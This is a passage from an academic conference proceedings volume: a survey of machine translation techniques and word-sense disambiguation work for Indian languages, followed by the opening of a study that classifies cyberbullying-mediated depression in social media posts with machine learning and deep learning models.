9. Anwar, A. (2020, November 06). Difference between AlexNet, VGGNet, ResNet and Inception.
Retrieved November 22, 2020 from https://towardsdatascience.com/the-w3h-of-alexnet-vgg
net-resnet-and-inception-7baaaecccc96.
10. Dwivedi, P. (2019, March 27). Understanding and coding a ResNet in Keras. Retrieved
November 05 2020. from https://towardsdatascience.com/understanding-and-coding-a-resnet-
in-keras-446d7ff84d33
11. Lazar, D. (March 06). Building a ResNet in Keras. Retrieved November 05, 2020. from https://
towardsdatascience.com/building-a-resnet-in-keras-e8f1322a49ba
Detection of Building Defects Using Convolutional Neural Networks 855

12. Prabhu. (2018, March 15). CNN Architectures—LeNet, AlexNet, VGG, GoogLeNet and
ResNet. Retrieved November 05, 2020. from https://medium.com/@RaghavPrabhu/cnn-arc
hitectures-lenet-alexnet-vgg-googlenet-and-resnet-7c81c017b848
13. Li, F.-F., Johnson, J., & Yeung, S. (2017, May 02). CNN Architecture. Retrieved http://cs231n.
stanford.edu/slides/2017/cs231n_2017_lecture9.pdf
14. Brownlee, J. (2019). A gentle introduction to the rectified linear unit (relu). Machine learning
mastery. https://machinelearningmastery.com/rectified-linear-activation-function-fordeep-lea
rning-neuralordeep-learning-neural.
15. Sachan, A. (2019, September 17). Detailed guide to understand and implement ResNets.
Retrieved November 05, 2020 from https://cv-tricks.com/keras/understand-implement-resnets/
16. Perez, H., Tah, J. H., & Mosavi, A. (2019). Deep learning for detecting building defects using
convolutional neural networks. Sensors, 19(16), 3556.
17. Kong, Q., Allen, R. M., Kohler, M. D., Heaton, T. H., & Bunn, J. (2018). Structural health
monitoring of buildings using smartphone sensors. Seismological Research Letters, 89(2A),
594–602.
18. Zhu, J., Zhang, C., Qi, H., & Ziyue, Lu. (2019). Vision-based defects detection for bridges using
transfer learning and convolutional neural networks. Structure and Infrastructure Engineering,
16(7), 1037–1049.
19. Rosebrock, A. (2018, December 31). Keras Conv2D and convolutional layers. Retrieved
November 05, 2020. from https://www.pyimagesearch.com/2018/12/31/keras-conv2d-and-
convolutional-layers/
20. Zhong, B., Xing, X., Love, P., Wang, X., & Luo, H. (2019). Convolutional neural network: Deep
learning-based classification of building quality problems. Advanced Engineering Informatics,
40, 46–57.
Tools and Techniques for Machine
Translation

Archana Sachindeo Maurya, Srishti Garg, and Promila Bahadur

Abstract Machine translation has been a subject of exploration for last numerous
years. A ton of observable work has been done in this field. Machine translation
involved serious speculation some time before there were computers to apply to it.
This paper aims to present different approaches, techniques, and algorithms used
for machine translation. Challenges of ambiguity in machine translation are also
discussed. The paper also outlines success reported in different categories by various
approaches taken along with challenges faced.

Keywords Machine translation · Natural language processing · Ambiguity ·


Statistical machine translation · Rule-based machine translation · Neural machine
translation · Ambiguity

1 Introduction

Language is a prodigy and a factor that joins various societies and a method of
communicating emotions and thoughts that individuals attempt to pass on. Transla-
tion assumes a critical job in moving social ideas between at least two dialects. There
are few boundaries or troubles that translators face in this procedure. We realize that
translation assumes a significant job in evacuating hindrance made by various soci-
eties and correspondence. Along these lines, translation is one of the basic keys and
sufficient route in moving society. A decent translator ought to at the same time know
about the social elements, perspectives, and convention so as to intentionally think
about the sequential requests, express importance, improvement of related controls,
recorded and strict foundation of the source text.
Machine translation has been attempted through multiple manners by linguistics.
The approaches can be appreciated from various angles like translation in terms of
technology, approaches adopted, techniques used, languages attempted to name a

A. S. Maurya · S. Garg · P. Bahadur (B)


Institute of Technology, SRMU, Lucknow, India
e-mail: pbahadur.csed.cf@ietlucknow.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 857
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_69
858 A. S. Maurya et al.

few. Further, the translated text can be judged on the basis of various parameters,
discussed as below.
a. Translation speed—This is determined by the response time of the translated
text.
b. Digital content—This is determined by the quality of translated audio and video
text across different devices.
c. Cross-platform—This is determined by the adoptability of translation tech-
nology among different platforms across different medias.
d. Translation quality—This is determined by the quality of translation and
accuracy.
e. MT approaches—This is determined by the efficiency of approaches that can
be applied for quality translations.
f. Cost—This is determined by the cost incurred for translation between source
and target language.
The paper outlines different translation approaches in Sect. 2. Section 3 is weaved
around different tools developed for machine translation. Section 4 discusses algo-
rithms used for machine translation. Section 5 addresses the ambiguity issues in
machine translation.

2 Machine Translation in Terms of Technology Used

Technology for machine translation can be categorized in terms of


a. Rule-based machine translation
b. Empirical machine translation.
Empirical is further categorized as example-based, statistical machine translation,
and neural machine translation as shown in Fig. 1.

2.1 Rule-Based Machine Translation

Rule-based translation primarily comprises of sentence analyzer, parser, bilingual


dictionary, rule base, sentence analyzer, and parse tree. The approach has reported
ninety percent of accuracy [1] as shown in Fig. 2.
Tools and Techniques for Machine Translation 859

Fig. 1 Categories of machine translation

Fig. 2 Rule-based machine translation process


860 A. S. Maurya et al.

Fig. 3 Statistical machine translation process

2.2 Statistical Machine Translation

Statistical machine translation (SMT) quality can be evaluated by the size of training
corpora and the resources used linguistic tool, dictionaries, etc. The quality of transla-
tion also depends on the language pair used. SMT comprises of major parts like dictio-
nary, training sets, decoding, and testing as shown in Fig. 3. The process has reported
eighty-seven percent of accuracy [2]. The open-source software Moses allows auto-
matic train translation model for any language pair and requires a collection of
translated text to do so.

2.3 Neural Machine Translation

In neural machine translation, source text has a set of specific features that is encoded
and other neural network decodes it. Each word depends on surrounding recurrent
neural network used to handle them as shown in Fig. 4. The network remembers
Tools and Techniques for Machine Translation 861

Fig. 4 Neural machine translation process

previous words. Neural machine translation has shown remarkable success in terms
of less word order mistakes [3–5], lexical and grammar mistake. Further open-source
ecosystem for neural machine translation and neural machine learning provides
implementation of deep learning framework [3, 4].

3 Machine Translation in Terms of Techniques Used

Phrase dependency tree bank (PDT) [6] has flat structures, and dependency is based
on semantics rather than syntactic functions that makes if different from binary
branching. Binary branching follows mainstream dependency analysis.
Automatic Post-editing tool [7] is proposed for automatic proposition of word
replacements for a machine translation output. This approach uses technique based
on bilingual word embedding. Further, the effectiveness of the tools is shown in terms
of two lexical errors: ‘not translated word’ and ‘incorrectly translated word.’
A partial dependency parser for Irish language is proposed, which uses Constraint
Grammar (CG) rules. The CG rules are used to annotate dependency relations and
grammatical functions in unrestricted Irish text. Chunks are performed using a
regular-expression grammar; they further operate on dependency tagged sentences.
The system that operates on F-score has further reported ninety-three percent on
development data and ninety-four percent on unseen test data, while the chunker
achieves F-score of ninety-seven percent on development data and ninety-three
percent on unseen test data. Chunking is performed using a regular-expression
grammar which operates on the dependency tagged sentences [8].
This paper proposes Extension of Sanskrit text to Universal Networking Language
expressions named as ‘SANSUNL’. The enhancement of POS tagging, Sanskrit
language processing and parsing was done. Further, 23 prefixes and 774 suffixes with
grammar rules of Sanskrit stemmer are used for stemming the Sanskrit sentence in
the proposed system. The efficiency of ninety-five percent evaluated on BLEU and
fluency score metrics was reported [9].
862 A. S. Maurya et al.

A virtual translation tool for generating text or voice in other languages is


presented. The system is expected to assist audiences in live presentations for under-
standing foreign language content. In this approach, the conventional translator
was taken over by neural machine translation. Further, human–machine interaction
was improved by using text-to-speech and speech recognition. Vietnamese-English
language pair showed the electiveness of the proposed system design and deployment
approach [1].
The proposed system used Dynamic Quality Framework (DQF) platform using ten
professional translators starting with raw machine translation segments of two texts—
an instruction manual and a marketing text—proposed by the Microsoft engine Trans-
lation (TAE) and Google Neural Machine Translation (TAN). Further the results
showed the productivity of neural motor as post-editing of proposals would take less
time [10].
The tool ‘Hinglish’ for translation between Pure Hindi and English is reported to
be capable of translating in three ways, i.e., Hinglish into pure Hindi and English,
pure Hindi into pure English, and vice versa. The techniques used are (1) direct
MT approach, (2) rule-based MT approach, and (3) hybrid MT approach in word
ordering. Further, the tool has reported the accuracy of 91% for providing output in
Hindi sentences and of 84% in providing output in English sentences with the input
sentences were in Hinglish [11].
The paper proposes paragraph-parallel corpus based on English and Chinese
versions of the novels and then design a hierarchical attention. Our encoder and
decoder take segmented clauses as input to process the words, clauses, paragraphs
at different levels, particularly with a two-layer transformer to capture the context
from both source and target languages. The output of the model based on the original
transformer is used as another level of abstraction, conditioning on its own previous
hidden states [12].
This paper proposes an analysis of adjectival constructions in HPSG, focussing on
the behavior of adjectives in NP, and develops an account of the familiar observation
that adjectives without complements typically precede the noun, while those with
complements or post-modifiers typically follow the noun [13].
The paper proposes empirically back-translation system matters for synthetic
corpus creation and that neural machine translation performance can be improved
by iterative back-translation in both high-resource and low-resource scenarios [14].
This paper presents multilingual machine translation between different languages
by introducing introduces an artificial token at the beginning of the input sentence to
specify the required target language in standard neural machine translation system.
Further, the authors have claimed to merge twelve language pairs and reported
reasonable success [34].
Open Source toolkit for neural machine translation (NMT) provides efficiency,
modularity, and extensibility in order to support NMT research into model archi-
tectures, feature representations, and source modalities. Toolkit further maintains
competitive performance and reasonable training requirements. The toolkit consists
of modeling and translation support, as well as detailed pedagogical documentation
about the underlying techniques [35].
Tools and Techniques for Machine Translation 863

4 Machine Translation in Terms of Algorithms Used

Machine translation is also attempted in terms of algorithms used it and has reported
a significant amount of success in the quality of translation as discussed below.
a. Error Analysis of SaHiT—A Statistical Sanskrit-Hindi Translator, proposed
for analyses error for Sanskrit to Hindi MTS that uses statistical approach. The
corpus was build and trained using MTHub platform. The error report generated
by MTHub system and during training of two phases BLEU forty-one percent
score was reported [15].
b. Machine translation system for the translation of English to Sanskrit Language
“EtranS”, proposed to improve quality of translation. Further, modules were
developed: (a) parse module—is responsible for parsing, i.e., after analysis
tokens are generated and grammatical and syntax analysis is done. (b) Gener-
ator module uses semantic information for mapping and on the basis of mapping
results were generated. The system reported accuracy of ninety percent for small,
large, and extra-large sentences [1].The system considers simple and compound
sentences.
Machine translation for the translation of English to Sanskrit language is proposed
in this paper. Here, the four modules are developed: lexical parser, semantic mapper,
translator, and composer. Lexical parser does POS tag information. Three different
rules are generated namely: equality rule, synonym rule, and antonym rule. After
parsing when tokens are generated and using dependency when relation between
token is found then tree is generated and mapping is done between English and
Sanskrit sentence [16].
The morphological analysis along with lexical analysis is reported. Rule format is
designed. Here, the root word and meaning of it is identified with the help of lexical
analyzer [17].
Parsing technique named as lexical functional grammar (LFG) for Sanskrit text.
LFG works on two basic types of syntactic representation: (a) constituent structure
and (b) functional structure are reported. LFG approach is used to bridge the gap
between Sanskrit and English as both the language representations are different. For
instance, English is subject-verb-object (SVO) and Sanskrit is subject-object-verb
(SOV). The objective is to develop a parsing technique. The system considers simple
sentences [18].

5 Addressing Ambiguity in Machine Translation

Addressing ambiguity is a major challenge in the field of machine translation. The


same has been addressed by many researchers. Ambiguity is addressed in many
languages and has attained a relative amount of success, reported as follows. Chal-
lenges in machine translation in terms of multiple meanings are reported. Further,
864 A. S. Maurya et al.

the possibility of multiple sentence structures is also outlined. Ambiguity is further


classified as word-sense ambiguity, reference ambiguity, and structural ambiguity
[19, 20].
A new system designed on supervised learning approach is reported. Classifica-
tion is based on the Naïve Bayes machine learning process. Five different features
were extracted: Unigram Co-occurrence, POS of Target Word, POS of Next Word,
Local Collocation, and Semantically Related Words. Further, a new semantic feature,
Semantically Related Words, to their previous work to the Naïve Bayes classification
process is added. Accuracy of ninety-one percent is reported [21].
Bag of words (BoW) and collocation model are applied on Naïve Bayes for disam-
biguation process. The system has reported enhancement in accuracy as the number
of senses decreases in both BoW and collocation model. Further, it determines that
BoW model gives the high accuracy over collocation model [22]. Unsupervised
graph-based approach is used for processing of sentence. The approach finds the
ambiguous words and creates a virtual graph on vector. The labeled nodes of the
graph similarity can be calculated which further develops the basis of similarity
value sense label. This is a novel approach for Indian languages. Further, higher
accuracy and adaptability are reported. The approach can also be applied in unsu-
pervised graph-based method [23]. Knowledge-based Lesk algorithm is used in the
system and the semantic similarity of the target word can be determined for the
collection of words set. Large WorldNet for Kannada is developed to store all types
of words. The method reported results to be more accurate and efficient [24].
Genetic algorithm is used for the disambiguation of Gujarati WordNet. This algo-
rithm is started with a set of solutions that is represented by chromosomes, called
population. According to this algorithm, solution from one population is taken and
it is used to form a new population. This algorithm can be developed to implement
other genetic algorithm components and different methods can be investigated to
implement the GA components. The components are initialization of the popula-
tion, parent selection, and survivor selection. The approach can also be used for
Indo-Aryan languages [25]. Unsupervised context similarity method develops sense
clusters using the seed sets. On the basis of similarity between the input text and
sense clusters, most similar sense is selected. Further, the accuracy of seventy-two
percent is reported [26]. Naïve Bayes probabilistic model using lemmatized system
is reported to perform better due to greater lexical coverage. The results obtained
were reported to be satisfactory. It is also ascertained that the stronger and popularly
organized training set will give the better result [27].
Support vector machine (SVM) for the disambiguation process for regression and
multiclass classification is used. This approach depends on POS tags and lemmatized
sense annotated corpus. It relies on the nearby words of the target word. Further, it is
reported that POS tags and lemma of surrounding words and morphological features
of the target word are the useful features for the better performance in disambigua-
tion process [28]. Decision list algorithm utilized training corpus to disambiguate all
the content words in the testing set that are used. One sense per collocation prop-
erty is used to disambiguate all ambiguous words. The corpus is divided into two
sets: training set and testing set. The decision list is constructed using the training
Tools and Techniques for Machine Translation 865

set data. Further, list is used for testing set data for disambiguation of ambiguous
words. Performance of the system is reported to be encouraging [29]. Hybrid training
method is used for better performance over supervised and unsupervised approach.
The algorithm further reported that unsupervised method gives sixty-three percent,
supervised method gives seventy-six percent, and hybrid method gives eighty percent
of accuracy. Therefore, it is concluded that accuracy is improved in hybrid approach
[30].
Naïve Bayesian method of supervised learning approach with high features is
reported. Here, forward sequential selection algorithm is used to choose the best set
of features. High accuracy is reported by using this method [31]. Novel context clus-
tering algorithm is presented in the Bayesian framework. This algorithm is based on
the similarities between context pairs. After that maximum entropy model is trained
to represent the probability distribution of context pair similarities based on hetero-
geneous, the approach has reported significant high performance in unsupervised
approaches and challenging the supervised WSD systems [32, 33].

6 Conclusion

Machine translation mechanism construction, by different approaches, has its own


advantages and disadvantages. The different ideas for machine translation inclusive
of techniques, technology used along with challenges have been addressed. Ambi-
guity is a major factor addressed by researchers. It plays a pivotal role in success
of a translation system. Different approaches to remove ambiguity and providing
translation non-ambiguously are a major task.
Encouraging results are reported by researchers in achieving high order of error-
free and non-ambiguous translation. All things considered, accomplishing hundred
percent error-free translations is an inaccessible objective as still the computers are
not sensitive enough to catch the state of mind of the orator and the goal is to
accomplish close to perfect translation in optimized time frame.

Acknowledgements The authors would like to thank Council of Science & Technology, UP for
providing fund under Adhoc-Research Scheme/Transfer of Technology Scheme with the reference
no-CST/D 2475.

References

1. Bahadur, P., Jain, A. K., & Chauhan, D. S. (2012). “EtranS-A complete framework for english to
sanskrit machine translation. International Journal of Advanced Computer Science and Appli-
cations(IJACSA), Special Issue on Selected Papers from International Conference & Workshop
On Emerging Trends In Technology. https://doi.org/10.14569/SpecialIssue.2012.020107
866 A. S. Maurya et al.

2. Sreelekha, S., Bhattacharyya, P., & Malathi, D. (2018, January). Statistical versus rule-based
machine translation: A comparative study on Indian languages. In International Conference
on Intelligent Computing and Applications.
3. Ott, M., Edunov, S., Grangier∗, D., & Auli, M. (2018). Scaling neural machine translation.
arXiv:1806.00187v3 [cs.CL] 4 Sep 2018
4. Hoang, C. D. V., Koehn, P., Haffari, G., & Cohn, T. (2018). Iterative back-translation for neural
machine translation. In Proceedings of the 2nd Workshop on Neural Machine Translation and
Generation, Melbourne, Australia, July 20 (pp. 18–24). c 2018 Association for Computational
Linguistics.
5. Johnson, M., Schuster, M., Le, Q. V., Krikun, M., Wu, Y., Chen, Z., Thorat, N., Viégas, F.,
Wattenberg, M., Corrado, G., Hughes, M., & Dean, J. (2017) Google’s multilingual neural
machine translation system: Enabling zero-shot translation.
6. Cao, J.-X., Huang, D.-G., Wang, W., & Wang, S.-J. (2014). Dalian Ligong Daxue
Xuebao/Journal of Dalian University of Technology, 54(1), 91–99.
7. Inácio, M. L., & Caseli, H. (2020). Word embeddings at post-editing february 2020 compu-
tational processing of the Portuguese Language. In 14th International Conference, PROPOR
2020, Evora, Portugal, March 2–4, Proceedings.
8. Dhonnchadha, E. U., & Genabith, J. V. (2010). Partial dependency parsing for Irish centre
for language and communication studies. Trinity College, Dublin, Ireland. Centre for Next
Generation Localisation, Dublin City University, Glasnevin, Dublin
9. Sitender & Bawa, S. (2020). Sanskrit to universal networking language EnConverter system
based on deep learning and context-free grammar. Multimedia Systems Metrics.
10. López-Pereira, A. (2019, December). Neural machine translation and statistical machine
translation: Perception and productivity, Revista Tradumàtica.
11. Attri, S. H., Prasad, T. V., & Ramakrishna, G. (2020). Computer Science, 21(3). https://doi.org/
10.7494/csci.2020.21.3.3624 HiPHET: Hybrid approach for translating mixed code language
(Hinglish) to pure languages (Hindi and English).
12. Zhang, Y., & Liu, G. (2020). Paragraph-parallel based neural machine translation model
with hierarchical attention. In Zhang, Y., & Liu, G.* (Eds.), School of Cyber Science
and Engineering, Shanghai Jiao Tong University, Shanghai, Shanghai, 200240, China cici-
-q@sjtu.edu.cn, lgshen@sjtu.edu.cn, Journal Physics: Conference Series, 1453, 012006.
13. Sadler, D. A. L. (1992) Noun-modifying adjectives in HPSG, Department of Language
and Linguistics, University of Essex, Wivenhoe Park, Colchester, CO4 3SQ, UK
louisa@essex.ac.uk doug@essex.ac.uk
14. Klein, G., Kim, Y., Deng, Y., & Senellart, Rush, A. M. (2017). OpenNMT: open-source toolkit
for neural machine translation. arXiv: 1701.02810v2 [cs.CL] 6 Mar 2017
15. Pandey & Jha (2016). Error Analysis of SaHiT—A Statistical Sanskrit-Hindi Translator.
16. Barkade et al .(2010). English to Sanskrit Machine Translation Semantic Mapper.
17. Tapaswi & Jain .(2011). Morphological and lexical analysis of the Sanskrit sentences.
18. Tapaswi et al .(2012). Parsing Sanskrit sentences using lexical functional grammar.
19. Sekharaiah, K. C., Gopal, U., & Khan, M. A. M. (2006) Obstacles to machine translation
20. Tapaswi et al. (2011): Morphological and lexical analysis of the Sanskrit sentences
21. Borah, P. P., Talukdar, G., & Baruah, A. (2019). WSD for Assamese Language.
22. Singh, V. P., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language.
23. Sheth, M., Popat, S., & Vyas, T. (2018). Word sense disambiguation for Indian Languages
24. Shashank, N. S., Kallimani, J. S. (2017). Word sense disambiguation of polysemy words in
Kannada language.
25. Zankhana, B., & Vaishnav (2017). Gujarati word sense disambiguation using genetic algorithm.
26. Sruthi Sankar, K. P., Raghu Raj, P. C., & Jayan, V. (2016). Unsupervised approach to word
sense disambiguation in Malayalam.
27. Pal, A. R., Saha, D., Naskar, S., & Sekhar, N. (2015). Dash, word sense disambiguation in
Bengali: A lemmatized system increases the accuracy of the result.
Tools and Techniques for Machine Translation 867

28. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features.
29. Parameswarappa, S., & Narayan, V. N. (2013). Kannada word sense disambiguation using
decision list.
30. Saktel, P., & Shrawankar, U. (2012). An improved approach for word ambiguity removal.
31. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features.
32. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities.
33. Le, N.-B., Dao, X.-Q., & Nguyen Thi, M.-T. (2021). In Design of Text and Voice Machine
Translation Tool for Presentations April 2021 Conference: 13th Asian Conference on Intelligent
Information and Database Systems. Phuket Thailand.
Cyberbullying-Mediated Depression
Detection in Social Media Using Machine
Learning

Akshi Kumar and Nitin Sachdeva

Abstract Mental distress is one of the most paramount causes of disability world-
wide. People using social media at an exponential rate becomes prey to cyberbullying
victimization, eventually leading to mental health problems. This study focused on
assessing the association of social media, cyberbullying, and mental depression via
the use of supervised learning techniques. In this work, learning techniques namely
support vector machines, random forests, Naïve Bayes, multilayer perceptron, convo-
lution neural network, and recurrent neural network have been applied on the data
(taken from Twitter and Reddit) for predicting cyberbullying-mediated depression
detection. Higher accuracy is observed with deep learning as compared to baseline
machine learning. Also, among the applied classical machine learning techniques,
random forests reported the highest accuracy.

Keywords Cyberbullying · Mental health · Depression · Social media

1 Introduction

Mental distress is a nervous disorder in which the suffering individual experiences


certain issues in their behavior, thinking, and the way he or she feels. It affects the
individual’s life in a way where their actions seems to be quite confusing or out
of order owing to which the person finds himself as troublesome. Symptoms such
as confused emotions/insomnia/depression/eating disorders/anxiety/rage are often
being exhibited by a mentally distressed person. It has been observed that depression
and anxiety have become the most usual mental disorder among the masses. Every
other person is vulnerable to either anxiety/depression. According to Diagnostic and
Statistical Manual of Mental Disorders [1], there are all over three hundred types of
mental disorders where depression is the most rampant. A depressed individual is
often found being sad, discouraged, scared, and lonely. This omnipresent disorder
may be due to bad things that happened to them in their lives in the past such

A. Kumar (B) · N. Sachdeva


Department of Computer Science and Engineering, Delhi Technological University, Delhi, India
e-mail: akshikumar@dce.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 869
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_70
870 A. Kumar and N. Sachdeva

as losing a job, lack of friends, strict parents, online trolling, cyberbullying (CB),
or any other related issues. Even so, with the technological advancements, people
are spending more time on social media rather than spending quality time with
their friends/family members. People suffering from mental distress [2] and other
depressive disorders generally use social media (SM) (such as Twitter, Reddit, and
Facebook) to share personal experiences, vent out their feelings and hear from other
people who are having similar issues. It is mainly related with emotional stress/social
anxiety/depressive symptoms/suicidal ideation/suicidal attempts, etc. CB [3–5] is
a rising public health concern that has been allied with multiple serious negative
consequences including depression, anxiety, insomnia, etc. Observing mental distress
on SM could have a serious impact on public health issues but when combined with
CB victimization, the impact could be exacerbated. Motivated by this, in our paper,
we focused on observing signs of depression on SM (namely Twitter and Reddit)
using supervised learning techniques like support vector machines (SVM), Naïve
Bayesian (NB), random forests (RF), multilayer perceptron (MLP), recurrent neural
network (RNN), and convolutional neural network (CNN). Term frequency–inverse
document frequency (TF-IDF) and Word2Vec were used for feature selection for ML
techniques, whereas word embedding [4] has been used for word feature vectorization
for DL techniques. Hence, we felt a classification (binary: CB-mediated depression
and non-CB-mediated depression) can be effectively conducted via analyzing the
texts written by people on SM (real-time user-generated data) at risk of or suffering
from mental illnesses (particularly depression due to CB).
Thus, the main contributions of this research is given below:
• Implement supervised ML and DL techniques for comparative analysis of CB-
mediated depression and non-CB-mediated depression detection (NB, SVM,
MLP, RF using TF-IDF, Word2Vec & CNN, RNN, Conv-RNN using GloVe) using
accuracy, precision, and recall on the data obtained from SM namely Twitter and
Reddit.
The rest of the paper is organized as follows. Second section discusses in brief
about the related work followed by discussion on the application of supervised
learning for CB detetction, results discussion, finally followed by conclusion and
future work discussion in the last sections.

2 Background and Related Work

This section briefs about the studies related to mental distress owing to CB victim-
ization on SM. Cenat et al. [6] studied CB and its serious consequences on teenagers
(depression, anxiety, suicide, loneliness). Logistic regression was used for predicting
mental distress, low self-esteem, etc., using CB victimization. Results showed that
girls had higher prevalence of CB. Nandhini et al. [7] proposed a CB detection system
that identified and classified flaming, harassment, etc., using Levenshtein algorithm
and NB. Enhanced results were obtained for CB detection and classification using
Cyberbullying-Mediated Depression Detection … 871

information retrieval algorithm. Nandhini et al. [8] proposed a system with enhanced
accuracy to classify harassment, racism, flaming, and terrorism using fuzzy logics and
genetic algorithms on the data taken from Myspace and Formspring.com. Frommholz
et al. [9] proposed a framework for identification of cyberstalking and harassment
using ML techniques with good results. Radovic et al. [10] examined the role of
SM on adolescents for depression detection caused due to CB, etc., via conducting
interviews for content analysis. Torous et al. [11] conducted a review in order to
assess suicide preventions in the current times using smartphones, sensors, and ML
techniques. Viner et al. [2] studied the association of SM and mental distress and
their related consequences (CB, etc.) on young people of England through content
analysis via questionnaire scoring. Talpur et al. [12] proposed a framework with
improved accuracy for CB detection by using PMI and ML techniques, namely NB,
kNN, SVM, RF, etc.

3 Supervised Learning for Observing Signs of Mental


Distress Due to Cyberbullying

This section discusses about the dataset used and the system architecture.

3.1 Dataset Discussion

In our study, we catered topics related to depression owing to CB. We also explored
that various established datasets for depression are also available online. But those
datasets focused on the posts containing depression and mental distress caused due
to several reasons such as lack of job, family issues, monetary aspects, and birth
defects. This made us synthesize our own dataset that focused primarily on catering
mental depression caused due to CB. Hence, we collected data from Twitter and
Reddit using the word ‘depression or mental distress.’ We collected around 20,000
samples that were then preprocessed. Data preprocessing employed removal of any
NaN, blank lines, punctuations, numbers, extra spaces, and stop words. Stemming
was performed. This left us with 19,731 samples. After this, we have manually
annotated it in order to study the CB-indicative symptoms. Post this, we classified the
dataset into binary classes: CB-mediated depression (CBMD) and non-CB-mediated
depression (N-CBMD). However, from our non-synthetic dataset, we observed that
approximate 18% of the data contained CB-mediated depression that eventually
made our corpus skewed (imbalanced) (CBMD contained 3551 samples and N-
CBMD contained 16,180 samples). In our case, former category is the minority
class (having fewer samples) whereas the latter one is the majority class (having
higher samples). One way of solving the imbalanced-class problem is to change the
872 A. Kumar and N. Sachdeva

Fig. 1 Word cloud build from the data collected from SM

class distributions in the training data by over-sampling the minority class or under-
sampling the majority class. So, in order to handle the data skewness, we incorporate
the use of ‘RandomOverSampler (ROS).’
Figure 1 shows the word cloud built from the collected data.

3.2 System Architecture

The system architecture is shown in Fig. 2. First phase was data collection and
preprocessing. Next was feature selection which was carried out using TF-IDF [3, 5]
and Word2Vec [13] for creating word feature vector which was then fed to supervised
machine learning techniques [14, 15] (SVM, NB, RF, MLP) and GloVe [4] being
used for RNN and CNN [4, 16–20] for further classification. Here, 80% of the data
was used for training and rest 20% was used for testing.

4 Results and Discussion

In this section, we present the comparative result analysis for CB detection using
precision (P), accuracy (A), and recall (R) [5] (all expressed in percentages). All
experiments were performed using tenfold cross-validation.

4.1 Results Obtained When TF-IDF Was Used for Feature


Extraction

Table 1 shows the results obtained where RF yielded highest A of around 93.4%.
Next comes NB, followed by MLP. Lowest A was obtained using SVM.
Cyberbullying-Mediated Depression Detection … 873

Fig. 2 System architecture

Table 1 Result obtained by applying TF-IDF and ML


Measure RF NB MLP SVM
A 93.44 93.33 92.99 87.04
P 92.25 91.2 90.0 82.57
R 92.38 90.43 89.0 87.23

4.2 Results Obtained When Word2Vec Was Used for Feature


Extraction

Table 2 shows the results obtained where similar observation has been reported
where RF yielded the highest A of around 90.36%. Next comes NB, followed by
MLP. Lowest A was obtained using SVM. Hence, we could infer that enhanced
prediction A was obtained using TF-IDF in comparison to Word2Vec.
Among all, the results of RF with ROS demonstrated the best performance in
binary classification with class imbalance distribution. Feature generation with ROS
at preprocessing stage has proven to be the effectual way for handling class imbalance.
874 A. Kumar and N. Sachdeva

Table 2 Result obtained by applying Word2Vec and ML


Measure RF NB MLP SVM
A 90.36 90.11 87.88 81.09
P 88.96 88.86 84.63 73.81
R 87.34 86.22 85.22 83.79

Table 3 Result obtained by


Measure RNN CNN Hybrid
applying GloVe and DL
A 94.24 94.49 95.9
P 91.89 85.19 92.79
R 90.01 75.48 94.14

Fig. 3 Comparative analysis


of the applied techniques
using accuracy

4.3 Results Obtained When DL Was Applied for CBMD


Detection

Table 3 shows the results obtained by applying (ROS by pretraining) RNN, CNN,
and Conv-RNN (hybrid) using GloVe [4].
From Table 3, it is observed that the hybrid Conv-RNN yielded highest accuracy
of around 96%. Next comes CNN (95%) followed by RNN (94%). Among all the
applied classical ML techniques, highest accuracy was reported with RF for binary
classification. Our findings also showed that the DL-based techniques outperformed
the ML techniques previously applied to the same dataset for CBMD detection and
N-CBMD detection (as depicted in Fig. 3).

5 Conclusion

Mental distress is a sensitive field that has attracted the attention of practitioners and
researchers for the decades. In this research, we performed a comparative analysis
Cyberbullying-Mediated Depression Detection … 875

of machine learning and deep learning techniques on the synthetic dataset collected
from Twitter and Reddit that focused primarily on mentally depressed tweets and
posts. From this dataset, we identified the samples by manual annotation that were
depressive owing to CB victimization and the other category being the samples
that were depressive due to any other reason (binary classification: CBMD and N-
CBMD). The resultant dataset was thus quite imbalanced. We employed the use of
random over sampling with feature generation at preprocessing step that seemed to
be the methodical technique for handling class imbalance in binary classification. We
then applied various ML and DL techniques on the comprised dataset and obtained
encouraging results. From the results obtained, we can conclude that DL produce
higher accuracy in comparison to baseline supervised ML techniques for observing
signs of depression (mental distress) caused due to online bullying. Also, from the
dataset distribution, we can also observe that though CB is not the major cause of
mental illness but indeed it is one of the most prominent reasons for mental depression
on SM.

6 Future Trends

This work will be beneficial for netizens who often use social networking sites
and are susceptible to mental illnesses. This problem is omnipresent but if we talk
particularly for countries like India where having and discussing any mental distress
is considered as a taboo, the condition is still bad. Here, people do not discuss their
mental state and they are not willing to take any help from professionals. There
is also a situation when people are not even able to understand and accept their
mental illness as well. Thus, an implicit method for automatic detection is the need
of the hour that will aid in the heedful observation of the indications of mental
distress among the people using social networking sites. Following the same lines,
we intend to make a robust real-time method that can help netizens in identifying
and analyzing their depressed state of mind due to CB in an efficient way. This work
could be augmented by implementing it for any Android systems (like apps that
could be used in mobiles, tabs, etc.) which could further be connected to doctors and
professionals in the relevant field. This would eventually help depressed individuals
in discussing their state of mind, mental health problems, and other issues they have
faced due to CB. This application would be more useful if made available to the
general public. Also, these can be further exploited for testing other domains such as
anxiety disorder detection. Also, other soft computing models (such as hierarchical
attention networks and feature optimizations) could also be applied for further testing
and analysis.
876 A. Kumar and N. Sachdeva

References

1. Depression-World Health Organization. https://www.who.int/news-room/fact-sheets/detail/


depression
2. Viner, R. M., Aswathikutty-Gireesh, A., Stiglic, N., Hudson, L. D., Goddings, A.-L., Ward,
J. L., & Nicholls, D. E.: Roles of cyberbullying, sleep and physical activity in mediating the
effects of social media use on mental health and wellbeing among young people in England: A
secondary analysis of longitudinal data. Journal of The Lancet Child and Adolescent Health,
